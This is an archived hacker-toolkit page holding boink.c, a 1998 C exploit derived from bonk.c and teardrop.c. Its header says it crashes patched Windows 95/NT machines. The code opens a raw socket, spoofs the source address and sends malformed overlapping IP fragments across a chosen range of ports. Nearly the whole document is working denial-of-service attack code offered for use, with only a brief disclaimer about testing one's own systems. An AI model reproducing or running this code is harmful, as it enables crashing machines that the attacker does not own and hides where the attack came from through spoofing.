home *** CD-ROM | disk | FTP | other *** search
/ Hackers Toolkit v2.0 / Hackers_Toolkit_v2.0.iso / HTML / archive / Unix / c-src / boink.c < prev    next >
C/C++ Source or Header  |  1999-11-04  |  6KB  |  206 lines

  1.  
  2. /*
  3.   boink.c - a modified bonk.c
  4.   
  5.   [ http://www.rootshell.com/ ]
  6.     
  7.     
  8.                                 ==bendi - 1998==
  9.  
  10.                         bonk.c        -         5/01/1998
  11.         Based On: teardrop.c by route|daemon9 & klepto
  12.         Crashes *patched* win95/(NT?) machines.
  13.  
  14.         Basically, we set the frag offset > header length (teardrop
  15.         reversed). There are many theories as to why this works,
  16.         however i do not have the resources to perform extensive testing.
  17.         I make no warranties. Use this code at your own risk.
  18.         Rip it if you like, i've had my fun.
  19.  
  20.     Modified by defile(efnet) [9/01/98]
  21.         
  22.         As it stood before, bonk.c just simply attacked port 55.
  23.         Upon scanning my associates, I've noticed port 55 isn't
  24.         always open. It varies in fact, while other ports remain
  25.         open and vulnerable to this attack. I realized that Microsoft
  26.         just might fix this by blocking port 55 off or something
  27.         completely lame like that, and that is unacceptable.
  28.         
  29.         As of this modification, you provide both a "start" and a
  30.         "stop" port to test for the weakness, in the attempt to catch
  31.         a possibly open port. (I've noticed port 55 seemed to come open
  32.         more frequently on machines that were running IE though)
  33.         
  34.         Hopefully this will encourage Microsoft to write a REAL fix
  35.         instead of just make lackey fixes as they've had in the past.
  36.         
  37.         Please only use this to test your own systems for vulnerability,
  38.         and if it is, bitch at Microsoft for a fix. I am not responsible
  39.         for any damage that may come and as stated above by the
  40.         author, this might not even work. I make no claims
  41.         to the ownership to any portions of this source in any way.
  42.         
  43.         
  44. */
  45.  
  46. #include <stdio.h>
  47. #include <string.h>
  48.  
  49. #include <netdb.h>
  50. #include <sys/socket.h>
  51. #include <sys/types.h>
  52. #include <netinet/in.h>
  53. #include <netinet/ip.h>
  54. #include <netinet/ip_udp.h>
  55. #include <netinet/protocols.h>
  56. #include <arpa/inet.h>
  57.  
  58. #define FRG_CONST       0x3
  59. #define PADDING         0x1c
  60.  
  61. struct udp_pkt
  62. {
  63.         struct iphdr    ip;
  64.         struct udphdr   udp;
  65.         char data[PADDING];
  66. } pkt;
  67.  
  68. int     udplen=sizeof(struct udphdr),
  69.         iplen=sizeof(struct iphdr),
  70.         datalen=100,
  71.         psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
  72.         spf_sck;                        /* Socket */
  73.  
  74. void usage(void)
  75. {
  76.         /* fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n"); */
  77.         fprintf (stderr, "Usage: ./boink <src_addr> <dst_addr> <start_port> <stop_port> [num]\n");
  78.         exit(0);
  79. }
  80.  
  81. u_long host_to_ip(char *host_name)
  82. {
  83.         static  u_long ip_bytes;
  84.         struct hostent *res;
  85.  
  86.         res = gethostbyname(host_name);
  87.         if (res == NULL)
  88.                 return (0);
  89.         memcpy(&ip_bytes, res->h_addr, res->h_length);
  90.         return (ip_bytes);
  91. }
  92.  
  93. void quit(char *reason)
  94. {
  95.         perror(reason);
  96.         close(spf_sck);
  97.         exit(-1);
  98. }
  99.  
  100. int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
  101.            int dst_prt)
  102. {
  103.         int     bs;
  104.         struct  sockaddr_in to;
  105.  
  106.         memset(&pkt, 0, psize);
  107.                                                 /* Fill in ip header */
  108.         pkt.ip.version = 4;
  109.         pkt.ip.ihl = 5;
  110.         pkt.ip.tot_len = htons(udplen + iplen + PADDING);
  111.         pkt.ip.id = htons(0x455);
  112.         pkt.ip.ttl = 255;
  113.         pkt.ip.protocol = IP_UDP;
  114.         pkt.ip.saddr = src_addr;
  115.         pkt.ip.daddr = dst_addr;
  116.         pkt.ip.frag_off = htons(0x2000);        /* more to come */
  117.  
  118.         pkt.udp.source = htons(src_prt);        /* udp header */
  119.         pkt.udp.dest = htons(dst_prt);
  120.         pkt.udp.len = htons(8 + PADDING);
  121.                                                 /* send 1st frag */
  122.  
  123.         to.sin_family = AF_INET;
  124.         to.sin_port = src_prt;
  125.         to.sin_addr.s_addr = dst_addr;
  126.  
  127.         bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
  128.                 sizeof(struct sockaddr));
  129.  
  130.         pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
  131.         pkt.ip.tot_len = htons(iplen + FRG_CONST);
  132.                                                         /* 2nd frag */
  133.  
  134.         bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
  135.                 (struct sockaddr *) &to, sizeof(struct sockaddr));
  136.  
  137.         return bs;
  138. }
  139.  
  140. void main(int argc, char *argv[])
  141. {
  142.         u_long  src_addr,
  143.                 dst_addr;
  144.  
  145.         int     i,
  146.                /* src_prt = 55,
  147.                   dst_prt = 55, */ 
  148.                 start_port,
  149.                 stop_port,
  150.                 bs = 1,
  151.                 pkt_count;
  152.  
  153.         if (argc < 5)
  154.                 usage();
  155.  
  156.         start_port = (u_short) atoi (argv[ 3 ]);
  157.         stop_port = (u_short) atoi (argv[ 4 ]);        
  158.         if (argc == 6)
  159.               pkt_count = atoi (argv[ 5 ]);
  160.         
  161.         
  162.         if (start_port >= stop_port ||
  163.             stop_port <= start_port) {
  164.                 
  165.                 start_port = 25;
  166.                 stop_port = 65;
  167.         
  168.         }
  169.         
  170.             
  171.         if (pkt_count == 0)    pkt_count = 10;
  172.         
  173.         /* Resolve hostnames */
  174.  
  175.         src_addr = host_to_ip(argv[1]);
  176.         if (!src_addr)
  177.                 quit("bad source host");
  178.         dst_addr = host_to_ip(argv[2]);
  179.         if (!dst_addr)
  180.                 quit("bad target host");
  181.  
  182.         spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  183.         if (!spf_sck)
  184.                 quit("socket()");
  185.         if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
  186.         sizeof(bs)) < 0)
  187.                 quit("IP_HDRINCL");
  188.  
  189.         for (i = 0; i < pkt_count; ++i)
  190.         {
  191.                 int j;
  192.                 
  193.                 printf ("(%d)%s:%d->%d\n", i, argv[ 2 ], start_port, stop_port);
  194.                 
  195.                 for (j = start_port; j != stop_port; j++) {
  196.                 
  197.                  /* fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); */
  198.                     fondle (spf_sck, src_addr, dst_addr, j, j);
  199.  
  200.                 }
  201.                 usleep(10000);
  202.         }
  203.  
  204.         printf("Done.\n");
  205. }
  206.